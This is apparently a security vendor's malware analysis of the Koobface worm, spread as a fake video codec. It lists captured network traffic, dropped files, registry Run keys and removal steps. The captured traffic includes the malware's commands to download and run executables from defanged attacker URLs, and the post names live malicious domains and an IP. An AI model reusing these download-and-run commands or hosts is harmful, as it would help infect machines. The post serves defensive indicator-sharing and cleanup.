Worm.Win32.Koobface
A user sent us another false video codec downloaded from a false movie website, that was using fake flash movies to push the user to download the false codec.
Once executed the program, it generates the following Internet traffic:
1 2 3 4 5 6 7 8 9 10 11 12 | POST /achcheck.php HTTP/1.1 Host: nua06032009.biz POST /ld/gen.php HTTP/1.1 Host: nua06032009.biz #PID=8000 STARTONCE|hxxp://stanishev.com/1/pch4.exe START|hxxp://stanishev.com/1/nfr.exe STARTONCE|hxxp://stanishev.com/1/pp.06.exe WAIT|120 #BLACKLABEL EXIT |
In the above traffic the malware is trying to download and install in the victim’s computer three new and different malware samples. Following there are the files created in the system after the download of the three URLs:
1 2 3 4 5 6 7 8 9 10 | C:\WINDOWS\ld08.exe C:\353454543.bat %User%\LOCALS~1\Temp\jopaxx_xx40040395.exe C:\WINDOWS\st_xx40038948.exe C:\dll32.bat %User%\LOCALS~1\Temp\jopaxx_1240028657.exe C:\WINDOWS\system32\dll32.exe C:\WINDOWS\9g2234wesdf3dfgjf23 C:\WINDOWS\pp06.exe C:\355674543.bat |
Note that a new .bat file was dropped in C:\ and then executed by the malware and these files were deleted:
1 2 3 4 | %User%\LOCALS~1\Temp\JOPAXX~2.EXE C:\355674~1.BAT C:\WINDOWS\ST_124~1.EXE C:\dll32.bat |
Running processes:
The program generates the following Internet traffic:
1 2 3 4 | GET /v50/search.php?p=10005&s=I&v=57&uid=-XXXXXXXXX&q= HTTP/1.1 User-Agent: Host: 85.13.236.154 Referer: |
Symptoms that can be noticed in an HiJackThis log:
1 2 3 4 5 6 7 8 9 10 | c:\windows\ld08.exe %User%\LOCALS~1\Temp\jopaxx_1240040395.exe c:\windows\pp06.exe C:\WINDOWS\System32\dll32.exe R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = http=localhost:7171 R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local;<local> O4 - HKLM\..\Run: [sysldtray] c:\windows\ld08.exe O4 - HKLM\..\Run: [pp] c:\windows\pp06.exe O4 - HKCU\..\Run: [dll32] dll32 |
How to remove this malware ?
1) Kill all the malicious running processes and remove the files, in my case:
1 2 3 4 | ld08.exe pp06.exe dll32.exe jopaxx_1240040395.exe |
2) Delete malicious registry keys, in my case:
1 2 3 | O4 - HKLM\..\Run: [sysldtray] c:\windows\ld08.exe O4 - HKLM\..\Run: [pp] c:\windows\pp06.exe O4 - HKCU\..\Run: [dll32] dll32 |
3) Block malicious IPs and domains, in my case:
1 2 3 | nua06032009.biz stanishev.com 85.13.236.154 (85.13.236.154.reverse.coreix.net) |
4) Update your AntiVirus and do a full system scan
5) Scan your system with NoVirusThanks Malware Remover
Leave a Reply